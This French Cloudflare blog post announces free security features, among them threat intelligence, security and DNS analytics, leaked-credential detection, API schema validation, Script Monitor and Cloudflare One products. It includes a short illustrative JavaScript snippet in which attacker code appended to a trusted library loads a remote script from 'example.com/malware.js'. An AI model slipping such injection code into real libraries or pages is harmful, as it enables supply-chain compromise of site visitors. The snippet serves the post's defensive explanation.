Abonnez-vous pour recevoir des notifications sur les nouveaux articles :

Un Internet plus sûr avec Cloudflare : des informations gratuites sur les menaces, des outils d'analyse de données et de nouveaux services de détection des menaces

2024-09-24

Lecture: 10 min.
Cet article est également disponible en English, en 繁體中文, en Deutsch, en 日本語, en 한국어, en Español et en 简体中文.

Tous les utilisateurs d'Internet sont susceptibles d'avoir quotidiennement recours au réseau de Cloudflare, que ce soit en accédant à un site protégé par Cloudflare, en utilisant notre résolveur 1.1.1.1 ou en se connectant via un réseau à l'aide de nos produits Cloudflare One.

Ceci confère à Cloudflare une grande responsabilité : celle de rendre l'Internet plus sûr pour les milliards d'internautes à travers le monde. Aujourd'hui, nous fournissons gratuitement à tous nos clients des informations sur les menaces, ainsi que plus de dix nouvelles fonctionnalités de sécurité. Que vous utilisiez Cloudflare pour protéger votre site web, votre réseau domestique ou votre bureau, vous trouverez une fonctionnalité utile que vous pourrez commencer à utiliser en quelques clics seulement.

Ces fonctionnalités sont conçues pour répondre à certaines des principales problématiques dans le domaine de la cybersécurité, notamment les attaques par usurpation de compte, les attaques contre la chaîne logistique, les attaques contre les points de terminaison d'API, la visibilité du réseau et les fuites de données depuis les réseaux.

Plus de sécurité pour tous

Vous pouvez en apprendre davantage sur chacune de ces fonctionnalités dans les sections ci-dessous, mais nous souhaitions d'abord vous proposer un bref récapitulatif. Si vous vous passionnez pour la cybersécurité, vous pouvez vous rendre sur notre nouveau site web d'informations sur les menaces Cloudforce One pour en savoir plus sur les auteurs de menaces, les campagnes d'attaques et les autres problèmes de sécurité affectant Internet.

Si vous êtes propriétaire d'un site web, à compter d'aujourd'hui, toutes les offres gratuites ont accès à la fonctionnalité Security Analytics pour leurs zones. Par ailleurs, nous mettons également la fonctionnalité DNS Analytics à la disposition de tous les utilisateurs via GraphQL.

Lorsque vous disposez d'une visibilité suffisante, il est essentiel de différencier le trafic légitime du trafic malveillant. Tous les clients ont accès à la fonctionnalité toujours active de détection des attaques par usurpation de compte, à la validation des schémas d'API afin d'appliquer un modèle de sécurité positive sur leurs points de terminaison d'API et à la fonctionnalité de Page Shield Script Monitor, qui offre une visibilité sur les ressources tierces chargées depuis votre côté, qui pourraient être utilisées pour perpétrer des attaques basées sur la chaîne logistique.

Si vous utilisez Cloudflare pour protéger votre personnel et votre réseau, nous allons regrouper un certain nombre de nos produits Cloudflare One dans une nouvelle offre gratuite. Cette offre inclut les produits Zero Trust actuellement proposés gratuitement, ainsi que de nouveaux produits tels que Magic Network Monitoring pour la visibilité du réseau, la solution de prévention des pertes de données (DLP, Data Loss Prevention) pour les données sensibles et Digital Experience Monitoring pour mesurer la connectivité et les performances du réseau. Cloudflare est le seul fournisseur à proposer des versions gratuites de ce type de produits.

Si vous êtes un nouvel utilisateur, nous proposons de nouvelles options d'authentification. Nous inaugurons dès aujourd'hui la possibilité d'utiliser Google Authentication pour l'inscription et la connexion à Cloudflare, ce qui facilitera le déroulement de la connexion pour certains de nos clients et réduira la nécessité de mémoriser des mots de passe, diminuant par conséquent le risque de compromission de leur compte Cloudflare.

Et maintenant, plus en détail :

Informations sur les menaces et analyses de données

Cloudforce One

Notre équipe de recherche et d'opérations sur les menaces, Cloudforce One, est heureuse d'annoncer le lancement d'un site web d'informations sur les menaces, accessible gratuitement. Nous utiliserons ce site pour publier à la fois des informations techniques et des informations destinées aux dirigeants concernant les activités et tactiques récentes des auteurs de menaces, ainsi que des informations concernant les logiciels malveillants, vulnérabilités et attaques émergents.

Nous publions également deux nouveaux documents d'informations sur les menaces, et nous en promettons davantage. Rendez-vous sur notre nouveau site web pour découvrir les nouvelles recherches examinant notamment les agissements d'un acteur persistant, soutenu par un État, qui cible les entreprises régionales d'Asie du Sud et d'Asie de l'Est, ainsi que l'essor de la fraude par double courtage (« double brokering ») du fret.  Abonnez-vous pour recevoir des notifications par e-mail sur les recherches concernant les menaces futures.

Security Analytics

La solution Security Analytics offre une visibilité sur l'ensemble de votre trafic HTTP, et pas uniquement sur les requêtes atténuées, vous permettant ainsi de vous concentrer sur ce qui importe le plus : le trafic considéré comme malveillant, mais potentiellement non atténué. Ainsi, en plus d'utiliser le service Security Events pour afficher les actions de sécurité mises en œuvre par notre suite de produits de sécurité des applications, vous pouvez utiliser la solution Security Analytics pour examiner l'ensemble de votre trafic à la recherche d'anomalies ou de comportements anormaux, puis utiliser les informations obtenues pour élaborer des règles d'atténuation précises, basées sur vos modèles de trafic spécifiques. À partir d'aujourd'hui, nous mettons cette perspective à la disposition de nos clients, quelle que soit l'offre souscrite.  Les utilisateurs des offres gratuite et Pro auront désormais accès à un nouveau tableau de bord pour la solution Security Analytics. Depuis ce tableau de bord, vous pouvez consulter un aperçu général de votre trafic sur le graphique d'analyse du trafic, avec la possibilité de regrouper et filtrer les données afin d'identifier facilement d'éventuelles anomalies. Vous pouvez également consulter les statistiques principales et filtrer en fonction de différentes dimensions, notamment par pays, navigateur source, système d'exploitation source, version de HTTP, version du protocole SSL, état du cache et actions de sécurité.

DNS Analytics

Tous les utilisateurs de Cloudflare ont désormais accès au nouveau tableau de bord amélioré DNS Analytics, ainsi qu'au nouvel ensemble de données DNS Analytics dans notre puissante API GraphQL. Vous pouvez désormais analyser facilement les requêtes DNS adressées à vos domaines, ce qui peut s'avérer utile pour résoudre les problèmes, détecter les modèles et les tendances ou générer des rapports d'utilisation en appliquant des filtres puissants et en répartissant les requêtes DNS en fonction de la source. Avec le lancement de Foundation DNS, nous avons inauguré une nouvelle solution DNS Analytics basée sur GraphQL ; cependant, ces analyses de données étaient auparavant uniquement disponibles pour les zones utilisant des serveurs de noms avancés. En raison des informations approfondies qu'offrent ces analyses de données, toutefois, nous avons estimé que cette fonctionnalité devait être mise à la disposition de tous les utilisateurs. À partir d'aujourd'hui, le nouveau service DNS Analytics basé sur GraphQL est accessible dans toutes les zones via le service DNS de référence de Cloudflare, sous l'en-tête Analytics (Analyses de données) dans la section DNS .

Détection et atténuation des menaces ciblant les applications

Détection des tentatives d'usurpation de comptes

65 % des utilisateurs d'Internet sont vulnérables aux tentatives d'usurpation de compte, en raison de la réutilisation des mots de passe et de la fréquence croissante des violations de données de grande ampleur. Contribuer à bâtir un Internet meilleur implique de proposer des services essentiels de protection des comptes faciles à utiliser et accessibles à tous.

À partir d'aujourd'hui, nous proposons gratuitement à tous les utilisateurs, des utilisateurs individuels jusqu'aux grandes entreprises, une fonctionnalité robuste de sécurité des comptes contribuant à prévenir les attaques par bourrage d'identifiants (« credential stuffing ») et les autres attaques par usurpation de compte. Le service propose gratuitement des fonctionnalités améliorées telles que la vérification des informations d'identification compromises et la détection d'usurpation de compte. 

Ces mises à jour incluent la détection automatique des connexions, la prévention des attaques par force brute avec une configuration minimale et l'accès à une base de données complète d'informations d'identification compromises contenant plus de quinze milliards de mots de passe, qui réunit les mots de passe divulgués par le service Have I Been Pwned (HIBP), en plus de la base de données de Cloudflare. Les clients peuvent réagir aux requêtes contenant des informations d'identification divulguées à l'aide des fonctionnalités du pare-feu WAF de Cloudflare, telles que les règles de contrôle du volume des requêtes et les règles personnalisées ; ils peuvent également prendre des dispositions au niveau du serveur d'origine en appliquant l'authentification multifacteur ou en exigeant une réinitialisation du mot de passe sur la base d'un en-tête transmis au serveur d'origine.

La configuration est simple : les utilisateurs de l'offre gratuite bénéficient de détections automatiques, tandis que les utilisateurs payants peuvent activer les nouvelles fonctionnalités en un clic depuis le tableau de bord de Cloudflare. Pour plus de détails concernant la mise en place et la configuration, consultez notre documentation et utilisez la solution dès aujourd'hui !

Validation des schémas d'API

Le trafic lié aux API représente plus de la moitié du trafic dynamique acheminé sur le réseau de Cloudflare. La popularité des API a ouvert la voie à une toute nouvelle série de vecteurs d'attaque. La fonctionnalité de validation de schémas de Cloudflare API Shield constitue la première étape pour renforcer la sécurité de vos API face à ces nouvelles menaces. 

Aujourd'hui, pour la première fois, tous les clients de Cloudflare peuvent utiliser la validation de schémas afin de s'assurer que seules les requêtes valides adressées à leur API atteignent effectivement leur serveur d'origine.

Cette fonctionnalité prévient la divulgation accidentelle d'informations en raison de bugs, empêche les développeurs d'exposer accidentellement leurs points de terminaison par le biais d'une procédure non standard et bloque automatiquement les API zombies à mesure de la mise à jour de votre inventaire d'API, dans le cadre de votre processus CI/CD.

Nous vous suggérons d'utiliser l'API de Cloudflare ou le fournisseur Terraform pour ajouter des points de terminaison à la solution Cloudflare API Shield, ainsi que de mettre à jour le schéma lorsque votre code a été publié dans le cadre de votre processus CI/CD après lancement. Ainsi, API Shield devient un outil incontournable pour l'inventaire des API, tandis que la validation de schémas assure la prise en charge des requêtes inattendues adressées à votre API.

Si la finalité des API est l'intégration de ressources tierces, il arrive que la mise en œuvre des intégrations repose sur le chargement de bibliothèques directement dans votre application. Ensuite, nous contribuons à sécuriser une plus grande partie du web en protégeant les utilisateurs contre les scripts tiers malveillants qui dérobent des informations sensibles à partir des saisies effectuées sur vos pages.

Prévention des attaques contre la chaîne logistique

Les applications web modernes améliorent l'expérience des utilisateurs et réduisent le temps de développement grâce à l'utilisation de bibliothèques JavaScript tierces. En raison du niveau d'accès privilégié dont dispose une bibliothèque JavaScript tierce à tous les éléments d'une page, la compromission de cette bibliothèque peut entraîner l'exfiltration dérobée des informations sensibles vers un acteur malveillant, sans que l'utilisateur final ou l'administrateur du site s'en aperçoive. Pour contrer cette menace, il y a trois ans de cela, nous avons lancé Page Shield, et la fonction Script Monitor de Page Shield est désormais disponible gratuitement pour tous nos utilisateurs.

Script Monitor vous permet de voir toutes les ressources JavaScript chargées sur la page, et pas uniquement celles incluses par vos développeurs. Cette visibilité inclut les scripts chargés dynamiquement par d'autres scripts ! Lorsqu'un acteur malveillant parvient à compromettre une bibliothèque, l'ajout d'un nouveau script malveillant sans modification du contexte du code HTML d'origine devient une tâche triviale, puisqu'il suffit d'inclure du nouveau code dans la ressource JavaScript incluse existante :

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

Script Monitor s'est montré indispensable lors de l'annonce du changement de propriétaire de la bibliothèque pollyfill.io. Les utilisateurs de Script Monitor disposaient d'une visibilité immédiate des scripts chargés sur leurs sites et ont pu rapidement et facilement évaluer s'ils étaient en danger.

Nous sommes heureux de pouvoir étendre la visibilité sur ces scripts à la plus grande partie possible du web avec le lancement de Script Monitor pour tous nos clients. Découvrez comment vous pouvez vous lancer ici, dans la documentation.

Les utilisateurs existants de Page Shield peuvent immédiatement filtrer les données surveillées et déterminer si le fichier polyfill.io (ou toute autre bibliothèque) est utilisé par leur application. Par ailleurs, nous avons développé une réécriture de polyfill.io en réponse au service compromis ; celle-ci a été automatiquement activée pour les offres gratuites en juin 2024.

Turnstile en tant qu'extension de Google Firebase 

Nous sommes heureux d'annoncer Cloudflare Turnstile App Check Provider pour Google Firebase, qui offre une intégration fluide, sans nécessiter de configuration manuelle. Cette nouvelle extension permet aux développeurs créant des applications mobiles ou web avec Firebase de protéger leurs projets contre les bots avec l'alternative aux CAPTCHA proposée par Cloudflare. En tirant parti des fonctionnalités de détection des bots et de vérification de Turnstile, vous pouvez vous assurer que seuls des visiteurs humains authentiques interagissent avec vos services backend dans Firebase, ce qui améliore à la fois la sécurité et l'expérience utilisateur. Cloudflare Turnstile, une alternative aux CAPTCHA priorisant la confidentialité, différencie les humains et les bots sans perturber l'expérience utilisateur. Contrairement aux solutions CAPTCHA traditionnelles, qui entraînent souvent des abandons par les utilisateurs, Turnstile opère de manière invisible et propose différents modes permettant de garantir des interactions fluides avec les utilisateurs.

Facile à intégrer, l'extension Firebase App Check pour Turnstile permet aux développeurs de renforcer rapidement la sécurité des applications avec des opérations de configuration minimales. Cette extension est également accessible gratuitement, avec une utilisation illimitée, dans le cadre de l'offre gratuite de Turnstile. En associant les avantages des services backend de Google Firebase et Cloudflare Turnstile, les développeurs peuvent proposer une expérience fluide et sécurisée à leurs utilisateurs. 

Cloudflare One

Cloudflare One est une plateforme SASE (Secure Access Service Edge) complète, conçue pour protéger et connecter le personnel, les applications, les appareils et les réseaux connectés à Internet. La solution réunit, dans une solution unique, une multitude de services, parmi lesquels l'accès réseau Zero Trust (ZTNA, Zero Trust Network Access) et une passerelle web sécurisée (SWG, Secure Web Gateway) et bien d'autres. Cloudflare One peut aider tous les utilisateurs à sécuriser le personnel et ses réseaux, gérer le contrôle des accès, se protéger contre les cybermenaces, protéger leurs données et améliorer les performances du trafic, grâce au routage du trafic sur le réseau mondial de Cloudflare. La solution remplace les mesures de sécurité traditionnelles en proposant une approche basée sur le cloud afin de sécuriser et de rationaliser l'accès aux ressources de l'entreprise. Tous les utilisateurs disposent désormais d'un accès gratuit à quatre nouveaux produits qui ont été ajoutés à Cloudflare One au cours des deux années passées :

Ces services s'ajoutent aux produits de sécurité réseau déjà intégrés à la plateforme Cloudflare One :

  • Access pour vérifier l'identité des utilisateurs et les autoriser à exécuter uniquement les applications qu'ils sont censés utiliser.

  • Gateway pour protéger le trafic réseau sortant vers l'Internet public et le trafic réseau entrant vers votre réseau privé.

  • Cloudflare Tunnel, nos connecteurs pour applications comprenant à la fois cloudflared et WARP Connector, pour connecter différents serveurs, réseaux privés et applications au réseau de Cloudflare.

  • Cloudflare WARP, notre agent sur appareil, pour la transmission sécurisée de trafic depuis un ordinateur portable ou un appareil mobile vers Internet.

Toute personne disposant d'un compte Cloudflare bénéficiera automatiquement de 50 postes gratuits pour l'ensemble de ces produits au sein de son organisation Cloudflare One. Rendez-vous sur notre page d'offres Zero Trust et SASE pour en savoir plus sur nos produits gratuits et en apprendre davantage sur nos offres avec facturation à l'utilisation et nos offres contractuelles pour les équipes de plus de 50 personnes.

Authentification avec Google

Le tableau de bord de Cloudflare est lui-même devenu une ressource vitale qui doit être protégée, et nous passons beaucoup de temps à veiller à ce que les comptes d'utilisateurs Cloudflare ne soient pas compromis.

À cette fin, nous avons renforcé la sécurité en ajoutant des méthodes d'authentification supplémentaires, parmi lesquelles l'authentification à deux facteurs (2FA) basée sur une application, les clés de sécurité, l'authentification unique (SSO) et Se connecter avec Apple. Aujourd'hui, nous ajoutons la possibilité de s'inscrire et se connecter avec un compte Google. 

Cloudflare prend en charge plusieurs flux de travail d'authentification adaptés à différents scénarios d'utilisation. Bien que l'authentification unique et les clés de sécurité soient les méthodes d'authentification préférées et les plus sécurisées, nous pensons que la fourniture de facteurs d'authentification plus forts que des mots de passe permettra de combler une lacune et d'améliorer le niveau de sécurité moyen de nos utilisateurs. La connexion avec Google facilite la vie de nos utilisateurs et leur évite de devoir se souvenir d'un nouveau mot de passe lorsqu'ils parcourent déjà Internet avec une identité Google.

Le service Se connecter avec Google repose sur la spécification OAuth 2.0 et autorise Google à partager de manière sécurisée les informations d'identification associées à une identité donnée, tout en garantissant que ces informations sont bien fournies par Google, empêchant ainsi d'éventuelles entités malveillantes d'usurper l'identité de Google.

Ceci nous permet de déléguer l'authentification à Google, ce qui empêche les attaques à divulgation nulle de connaissance directement contre cette identité Cloudflare.

Lorsque vous atteignez la page de connexion de Cloudflare, le bouton ci-dessous vous est présenté. En cliquant sur le lien, vous pouvez vous inscrire sur Cloudflare ; une fois inscrit, vous pouvez vous connecter sans saisir de mot de passe, en utilisant les protections existantes, définies sur votre compte Google.

Le lancement de cette fonctionnalité permet à Cloudflare d'utiliser ses instances Cloudflare Workers pour fournir une couche d'abstraction pour les fournisseurs d'identité compatibles OIDC (tels que les comptes GitHub et Microsoft). Nos utilisateurs peuvent donc s'attendre à bénéficier de la prise en charge des connexions via d'autres fournisseurs d'identité, à l'avenir.

Pour le moment, seuls les nouveaux clients s'inscrivant avec Google pourront se connecter avec leur compte Google ; toutefois, nous allons mettre en œuvre cette fonctionnalité pour un plus grand nombre de nos utilisateurs à l'avenir, avec la possibilité de connecter/déconnecter des fournisseurs de connexion par identifiants sociaux. Par ailleurs, nous allons ajouter d'autres méthodes de connexion par identifiants sociaux. Les utilisateurs Enterprise disposant d'une configuration d'authentification unique (SSO) ne pourront pas utiliser cette méthode, pour le moment. Quant aux utilisateurs disposant d'une configuration d'authentification unique établie et basée sur Google Workspace, ils seront redirigés vers leur flux d'authentification unique, car nous réfléchissons à la manière de rationaliser les politiques Access et IdP qui ont été configurées dans le but de sécuriser votre environnement Cloudflare.

Si vous êtes un nouvel utilisateur de Cloudflare et vous disposez d'un compte Google, il est plus facile que jamais de commencer à utiliser Cloudflare pour protéger vos sites web, développer un nouveau service ou essayer n'importe lequel des autres services proposés par Cloudflare.

Un Internet plus sûr

L'un des objectifs de Cloudflare a toujours été de démocratiser les outils de cybersécurité, afin que chacun puisse proposer des contenus et se connecter à Internet en toute sécurité, même s'il ne dispose pas des ressources des grandes entreprises.

Nous avons décidé de fournir gratuitement à tous les utilisateurs de Cloudflare une large sélection de nouvelles fonctionnalités, couvrant un vaste ensemble de scénarios d'utilisation dans le domaine de la sécurité. Cette offre s'adresse aux administrateurs web, aux administrateurs réseau et aux passionnés de la cybersécurité. Connectez-vous à votre compte Cloudflare pour commencer à profiter dès aujourd'hui de ces annonces. Nous vous sommes reconnaissants pour vos commentaires sur nos forums communautaires, et nous engageons à améliorer à la fois les fonctionnalités existantes et les nouvelles fonctionnalités à l'avenir.

Regarder sur Cloudflare TV

Nous protégeons des réseaux d'entreprise entiers, aidons nos clients à développer efficacement des applications à l'échelle d'Internet, accélérons tous les sites web ou applications Internet, repoussons les attaques DDoS, tenons les pirates informatiques à distance et pouvons vous accompagner dans votre parcours d'adoption de l'architecture Zero Trust.

Accédez à 1.1.1.1 depuis n'importe quel appareil pour commencer à utiliser notre application gratuite, qui rend votre navigation Internet plus rapide et plus sûre.

Pour en apprendre davantage sur notre mission, à savoir contribuer à bâtir un Internet meilleur, cliquez ici. Si vous cherchez de nouvelles perspectives professionnelles, consultez nos postes vacants.
Birthday Week (FR)SécuritéCASB (FR)DLPData Loss PreventionThreat IntelligenceZero TrustCloudflare OnePage ShieldLeaked Credential ChecksSASE

Suivre sur X

Michael Tremante|@MichaelTremante
Reid Tatoris|@reidtatoris
Cloudflare|@cloudflare

Publications associées

23 octobre 2024 à 13:00

Fearless SSH: short-lived certificates bring Zero Trust to infrastructure

Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. ...